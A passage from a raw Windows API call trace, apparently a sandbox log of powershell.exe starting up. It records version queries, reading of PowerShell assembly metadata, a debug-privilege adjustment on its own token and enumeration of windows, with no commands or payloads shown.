dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0136.964] GetLastError () returned 0x2 [0136.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e37c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.970] GetLastError () returned 0x2 [0137.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e398, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0137.038] GetLastError () returned 0x2 [0137.038] GetVersionExW (in: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0137.038] GetLastError () returned 0x2 [0137.039] SetErrorMode (uMode=0x1) returned 0x1 [0137.040] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25e818 | out: lpFileInformation=0x25e818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0137.041] GetLastError () returned 0x2 [0137.041] SetErrorMode (uMode=0x1) returned 0x1 [0137.043] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25e89c | out: lpdwHandle=0x25e89c) returned 0x94c [0137.045] GetLastError () returned 0x0 [0137.046] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a14d48 | out: lpData=0x2a14d48) returned 1 [0137.049] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e868, puLen=0x25e864 | out: lplpBuffer=0x25e868*=0x2a14de4, puLen=0x25e864) returned 1 [0137.051] lstrlenW (lpString="䅁") returned 1 [0137.061] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a14ec0, puLen=0x25e7e0) returned 1 [0137.061] lstrlenW (lpString="Microsoft Corporation") returned 21 [0137.062] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0137.062] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a14f14, puLen=0x25e7e0) returned 1 [0137.062] lstrlenW (lpString="System.Management.Automation") returned 28 [0137.062] lstrcpyW (in: lpString1=0x2e48d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0137.062] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a14f70, puLen=0x25e7e0) returned 1 [0137.062] lstrlenW (lpString="6.1.7601.17514") returned 14 [0137.063] lstrcpyW (in: lpString1=0x2e48d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0137.063] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a14fb0, puLen=0x25e7e0) returned 1 [0137.063] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0137.063] lstrcpyW (in: lpString1=0x2e48d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0137.063] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a15018, puLen=0x25e7e0) returned 1 [0137.063] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0137.063] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0137.063] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a150b4, puLen=0x25e7e0) returned 1 [0137.063] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0137.063] lstrcpyW (in: lpString1=0x2e48d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0137.063] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a15118, puLen=0x25e7e0) returned 1 [0137.063] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0137.063] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0137.063] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a15194, puLen=0x25e7e0) returned 1 [0137.063] lstrlenW (lpString="6.1.7601.17514") returned 14 [0137.063] lstrcpyW (in: lpString1=0x2e48d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0137.063] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x2a14e3c, puLen=0x25e7e0) returned 1 [0137.063] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0137.063] lstrcpyW (in: lpString1=0x2e48d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0137.064] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x0, puLen=0x25e7e0) returned 0 [0137.064] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x0, puLen=0x25e7e0) returned 0 [0137.064] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25e7e4, puLen=0x25e7e0 | out: lplpBuffer=0x25e7e4*=0x0, puLen=0x25e7e0) returned 0 [0137.064] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e7d8, puLen=0x25e7d4 | out: lplpBuffer=0x25e7d8*=0x2a14de4, puLen=0x25e7d4) returned 1 [0137.065] VerLanguageNameW (in: wLang=0x0, szLang=0x2e48d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0137.069] VerQueryValueW (in: pBlock=0x2a14d48, lpSubBlock="\\", lplpBuffer=0x25e7ec, puLen=0x25e7e8 | out: lplpBuffer=0x25e7ec*=0x2a14d70, puLen=0x25e7e8) returned 1 [0137.076] GetCurrentProcessId () returned 0x328 [0137.094] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x25e024 | out: lpLuid=0x25e024*(LowPart=0x14, HighPart=0)) returned 1 [0137.095] GetLastError () returned 0x0 [0137.097] GetCurrentProcess () returned 0xffffffff [0137.097] GetLastError () returned 0x0 [0137.098] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x25e020 | out: TokenHandle=0x25e020*=0x310) returned 1 [0137.098] GetLastError () returned 0x0 [0137.101] AdjustTokenPrivileges (in: TokenHandle=0x310, DisableAllPrivileges=0, NewState=0x2a17888*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0137.101] GetLastError () returned 0x0 [0137.102] CloseHandle (hObject=0x310) returned 1 [0137.102] GetLastError () returned 0x0 [0137.107] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x328) returned 0x310 [0137.107] GetLastError () returned 0x0 [0137.115] EnumProcessModules (in: hProcess=0x310, lphModule=0x2a178cc, cb=0x100, lpcbNeeded=0x25e814 | out: lphModule=0x2a178cc, lpcbNeeded=0x25e814) returned 1 [0137.116] GetLastError () returned 0x0 [0137.119] GetModuleInformation (in: hProcess=0x310, hModule=0x22280000, lpmodinfo=0x2a17a0c, cb=0xc | out: lpmodinfo=0x2a17a0c*(lpBaseOfDll=0x22280000, SizeOfImage=0x72000, EntryPoint=0x22287363)) returned 1 [0137.119] GetLastError () returned 0x0 [0137.121] GetModuleBaseNameW (in: hProcess=0x310, hModule=0x22280000, lpBaseName=0x315040, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0137.121] GetLastError () returned 0x0 [0137.122] GetModuleFileNameExW (in: hProcess=0x310, hModule=0x22280000, lpFilename=0x315040, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0137.122] GetLastError () returned 0x0 [0137.123] CloseHandle (hObject=0x310) returned 1 [0137.123] GetLastError () returned 0x0 [0137.125] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x328) returned 0x310 [0137.125] GetLastError () returned 0x0 [0137.127] GetExitCodeProcess (in: hProcess=0x310, lpExitCode=0x2a16ebc | out: lpExitCode=0x2a16ebc*=0x103) returned 1 [0137.127] GetLastError () returned 0x0 [0137.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3a15278, Length=0x20000, ResultLength=0x25e85c | out: SystemInformation=0x3a15278, ResultLength=0x25e85c*=0x7dd8) returned 0x0 [0137.150] EnumWindows (lpEnumFunc=0x29d3612, lParam=0x0) returned 1 [0137.152] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7dc [0137.152] GetLastError () returned 0x0 [0137.152] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7fc [0137.152] GetLastError () returned 0x0 [0137.152] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.152] GetLastError () returned 0x0 [0137.152] GetWindowThreadProcessId (in: hWnd=0x200c8, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.152] GetLastError () returned 0x0 [0137.152] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.152] GetLastError () returned 0x0 [0137.152] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.152] GetLastError () returned 0x0 [0137.153] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6f4 [0137.153] GetLastError () returned 0x0 [0137.153] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6f4 [0137.153] GetLastError () returned 0x0 [0137.153] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.153] GetLastError () returned 0x0 [0137.153] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.153] GetLastError () returned 0x0 [0137.153] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.153] GetLastError () returned 0x0 [0137.153] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.153] GetLastError () returned 0x0 [0137.153] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.153] GetLastError () returned 0x0 [0137.154] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.154] GetLastError () returned 0x0 [0137.154] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.154] GetLastError () returned 0x0 [0137.154] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.154] GetLastError () returned 0x0 [0137.154] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.154] GetLastError () returned 0x0 [0137.154] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x454 [0137.154] GetLastError () returned 0x0 [0137.154] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.154] GetLastError () returned 0x0 [0137.154] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.154] GetLastError () returned 0x0 [0137.155] GetWindowThreadProcessId (in: hWnd=0x200ec, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.155] GetLastError () returned 0x0 [0137.155] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6bc [0137.155] GetLastError () returned 0x0 [0137.155] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6bc [0137.155] GetLastError () returned 0x0 [0137.155] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6bc [0137.155] GetLastError () returned 0x0 [0137.155] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x360 [0137.155] GetLastError () returned 0x0 [0137.155] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6fc [0137.155] GetLastError () returned 0x0 [0137.155] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7dc [0137.155] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x10140, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7d8 [0137.156] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x20136, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7dc [0137.156] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7d8 [0137.156] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x200d8, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.156] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x200d4, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.156] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x200ce, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.156] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x200b8, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.156] GetLastError () returned 0x0 [0137.156] GetWindowThreadProcessId (in: hWnd=0x200c0, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.156] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x300ba, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.157] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x800a6, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.157] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x200da, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7dc [0137.157] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6fc [0137.157] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6fc [0137.157] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x558 [0137.157] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x570 [0137.157] GetLastError () returned 0x0 [0137.157] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x454 [0137.158] GetLastError () returned 0x0 [0137.158] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x528 [0137.158] GetLastError () returned 0x0 [0137.158] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.158] GetLastError () returned 0x0 [0137.158] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x500 [0137.158] GetLastError () returned 0x0 [0137.158] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.158] GetLastError () returned 0x0 [0137.158] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.158] GetLastError () returned 0x0 [0137.158] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.158] GetLastError () returned 0x0 [0137.158] GetWindowThreadProcessId (in: hWnd=0x3014c, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x580 [0137.158] GetLastError () returned 0x0 [0137.159] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x5d4 [0137.159] GetLastError () returned 0x0 [0137.159] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.159] GetLastError () returned 0x0 [0137.159] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4d8 [0137.159] GetLastError () returned 0x0 [0137.159] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.159] GetLastError () returned 0x0 [0137.159] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x454 [0137.159] GetLastError () returned 0x0 [0137.159] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x454 [0137.159] GetLastError () returned 0x0 [0137.159] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x444 [0137.159] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6f4 [0137.160] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x454 [0137.160] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7fc [0137.160] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.160] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4a8 [0137.160] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6bc [0137.160] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x360 [0137.160] GetLastError () returned 0x0 [0137.160] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7d8 [0137.160] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x200fe, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x7dc [0137.161] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6fc [0137.161] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x558 [0137.161] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x454 [0137.161] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x580 [0137.161] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x5d4 [0137.161] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x4d8 [0137.161] GetLastError () returned 0x0 [0137.161] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x454 [0137.162] GetLastError () returned 0x0 [0137.162] GetWindowThreadProcessId (in: hWnd=0x20106, lpdwProcessId=0x25e4b0 | out: lpdwProcessId=0x25e4b0) returned 0x6f4 [0137.162] GetLastError () returned 0x0 [0137.162] GetLastError () returned 0x0 [0137.164] WerSetFlags () returned 0x0 [0137.175] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0137.177] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25e88c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25e888 | out: pulNumLanguages=0x25e88c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25e888) returned 1 [0137.177] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25e88c, pwszLanguagesBuffer=0x2a28044, pcchLanguagesBuffer=0x25e888 | out: pulNumLanguages=0x25e88c, pwszLanguagesBuffer=0x2a28044, pcchLanguagesBuffer=0x25e888) returned 1 [0137.184] GetUserDefaultLocaleName (in: lpLocaleName=0x2e48d0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0137.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.263] GetLastError () returned 0xcb [0137.267] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.267] GetLastError () returned 0xcb [0137.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e48d0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0137.268] GetLastError () returned 0xcb [0137.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0137.278] GetLastError () returned 0xcb [0137.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e318, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0137.278] GetLastError () returned 0xcb [0137.278] SetErrorMode (uMode=0x1) returned 0x1 [0137.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25e798 | out: 